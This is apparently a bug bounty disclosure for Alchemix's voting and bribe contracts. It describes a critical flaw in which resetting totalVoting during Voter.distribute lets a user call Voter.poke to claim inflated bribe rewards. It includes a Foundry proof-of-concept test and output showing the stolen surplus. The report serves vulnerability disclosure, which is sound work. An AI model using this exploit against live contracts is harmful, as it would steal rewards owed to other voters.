Submitted on May 15th 2024 at 19:58:42 UTC by @jasonxiale for Boost | Alchemix
Report ID: #31249
Report type: Smart Contract
Report severity: Critical
In current implementation, Voter.distribute
is used to distribute ALCX among gauges, during the call there is an issue that a malicious user can back-run Voter.distribute
to steal reards.
Vulnerability Details
During the Voter.distribute
function, Voter._distribute is called, and at the end of Voter._distribute
, IBribe.resetVoting
is called at [] IBribe.resetVoting is defined as:
Copy 345 /// @inheritdoc IBribe
346 function resetVoting () external {
347 require (msg.sender == voter);
348 totalVoting = 0 ;
349 }
So it means that after calling Voter.distribute
, Bribe.totalVoting
will be set to 0.
Then in Bribe.earned
, Bribe.totalVoting
is used in Bribe.sol#L257-L261 and Bribe.sol#L268-L277 . One thing to note is that:
Copy 270 // Prevent divide by zero
271 if (_priorSupply == 0 ) {
272 _priorSupply = 1 ;
273 }
So it means that if _priorSupply will be set to 1 if it's 0. And reward
depends on _priorSupply
Copy reward += (cp.balanceOf * tokenRewardsPerEpoch[token][_lastEpochStart]) / _priorSupply;
To sum up:
During Voter.distribute
, Bribe.totalVoting
will be set to 0
depends of Bribe.totalVoting
to calculate the amount of rewards. And if we can force _priorSupply
to 1 while calculating the rewards, we will make more profilt. We can use Voter.poke
to update the checkpoint
after Voter.distribute
Impact Details
In current implementation, Voter.distribute
is used to distribute ALCX among gauges, during the call there is an issue that a malicious user can back-run Voter.distribute
to steal reards.
Add any relevant links to documentation or code
Proof of Concept
put the follow code in src/test/Voting.t.sol
and run
Copy FOUNDRY_PROFILE = default forge test --fork-url $API_KEY --fork-block-number 17133822 --mc VotingTest --mt testAliceEpochRewards -vv
[⠊] Compiling...
No files changed, compilation skipped
Ran 2 tests for src/test/Voting.t.sol:VotingTest
[PASS] testAliceEpochRewardsNoPoke () ( gas: 6888013 )
earned : 33333333333333333333333
earned : 33333333333333333333333
bal.balanceOf(Alice ) : 33333333333333333333333
bal.balanceOf(Bob ) : 0
[PASS] testAliceEpochRewardsPoke () ( gas: 6969463 )
earned : 100000000000000000000000
earned : 100000000000000000000000
bal.balanceOf(Alice ) : 100000000000000000000000
bal.balanceOf(Bob ) : 0
Suite result: ok. 2 passed ; 0 failed ; 0 skipped ; finished in 86.68ms (116.98ms CPU time )
As we can from above, if Alice doesn't call Voter.poke
after Voter.distribute
, Alice will receive 33333333333333333333333 bal rewards.
And if Alice calls Voter.poke
after Voter.distribute
, Alice will receive 100000000000000000000000 bal rewards.
Copy function testAliceEpochRewardsPoke () public {
uint256 period = minter. activePeriod ();
hevm. warp (period + nextEpoch);
hevm. roll (block.number + 1 );
deal ( address (alcx) , address (voter) , TOKEN_100K);
hevm. prank ( address (voter));
sushiGauge. notifyRewardAmount (TOKEN_100K);
address Alice = address ( 0x11001100 );
address Bob = address ( 0x22002200 );
address Chris = address ( 0x33003300 );
// Create a veALCX token and vote to trigger voter rewards
uint256 tokenId1 = createVeAlcx (Alice , TOKEN_1 , MAXTIME , false );
uint256 tokenId2 = createVeAlcx (Bob , TOKEN_1 , MAXTIME , false );
uint256 tokenId3 = createVeAlcx (Chris , TOKEN_1 , MAXTIME , false );
address [] memory pools = new address []( 1 );
pools[ 0 ] = sushiPoolAddress;
uint256 [] memory weights = new uint256 []( 1 );
weights[ 0 ] = 5000 ;
address [] memory gauges = new address []( 1 );
gauges[ 0 ] = address (sushiGauge);
hevm. prank (Alice);
voter. vote (tokenId1 , pools , weights , 0 );
hevm. prank (Bob);
voter. vote (tokenId2 , pools , weights , 0 );
hevm. prank (Chris);
voter. vote (tokenId3 , pools , weights , 0 );
address bribeAddress = voter. bribes ( address (sushiGauge));
createThirdPartyBribe (bribeAddress , bal , TOKEN_100K);
voter. distribute ();
hevm. prank (Alice);
voter. poke (tokenId1);
hevm. warp (block.timestamp + nextEpoch);
address [] memory bribes = new address []( 1 );
bribes[ 0 ] = bribeAddress;
address [][] memory tokens = new address [][]( 1 );
tokens[ 0 ] = new address []( 1 );
tokens[ 0 ][ 0 ] = bal;
console2. log ( "earned :" , IBribe (bribeAddress). earned ( address (bal) , tokenId1));
console2. log ( "earned :" , IBribe (bribeAddress). earned ( address (bal) , tokenId2));
hevm. prank (Alice);
voter. claimBribes (bribes , tokens , tokenId1);
console2. log ( "bal.balanceOf(Alice) :" , IERC20 (bal). balanceOf (Alice));
console2. log ( "bal.balanceOf(Bob) :" , IERC20 (bal). balanceOf (Bob));
function testAliceEpochRewardsNoPoke () public {
uint256 period = minter. activePeriod ();
hevm. warp (period + nextEpoch);
hevm. roll (block.number + 1 );
deal ( address (alcx) , address (voter) , TOKEN_100K);
hevm. prank ( address (voter));
sushiGauge. notifyRewardAmount (TOKEN_100K);
address Alice = address ( 0x11001100 );
address Bob = address ( 0x22002200 );
address Chris = address ( 0x33003300 );
// Create a veALCX token and vote to trigger voter rewards
uint256 tokenId1 = createVeAlcx (Alice , TOKEN_1 , MAXTIME , false );
uint256 tokenId2 = createVeAlcx (Bob , TOKEN_1 , MAXTIME , false );
uint256 tokenId3 = createVeAlcx (Chris , TOKEN_1 , MAXTIME , false );
address [] memory pools = new address []( 1 );
pools[ 0 ] = sushiPoolAddress;
uint256 [] memory weights = new uint256 []( 1 );
weights[ 0 ] = 5000 ;
address [] memory gauges = new address []( 1 );
gauges[ 0 ] = address (sushiGauge);
hevm. prank (Alice);
voter. vote (tokenId1 , pools , weights , 0 );
hevm. prank (Bob);
voter. vote (tokenId2 , pools , weights , 0 );
hevm. prank (Chris);
voter. vote (tokenId3 , pools , weights , 0 );
address bribeAddress = voter. bribes ( address (sushiGauge));
createThirdPartyBribe (bribeAddress , bal , TOKEN_100K);
voter. distribute ();
hevm. warp (block.timestamp + nextEpoch);
address [] memory bribes = new address []( 1 );
bribes[ 0 ] = bribeAddress;
address [][] memory tokens = new address [][]( 1 );
tokens[ 0 ] = new address []( 1 );
tokens[ 0 ][ 0 ] = bal;
console2. log ( "earned :" , IBribe (bribeAddress). earned ( address (bal) , tokenId1));
console2. log ( "earned :" , IBribe (bribeAddress). earned ( address (bal) , tokenId2));
hevm. prank (Alice);
voter. claimBribes (bribes , tokens , tokenId1);
console2. log ( "bal.balanceOf(Alice) :" , IERC20 (bal). balanceOf (Alice));
console2. log ( "bal.balanceOf(Bob) :" , IERC20 (bal). balanceOf (Bob));
Last updated 4 months ago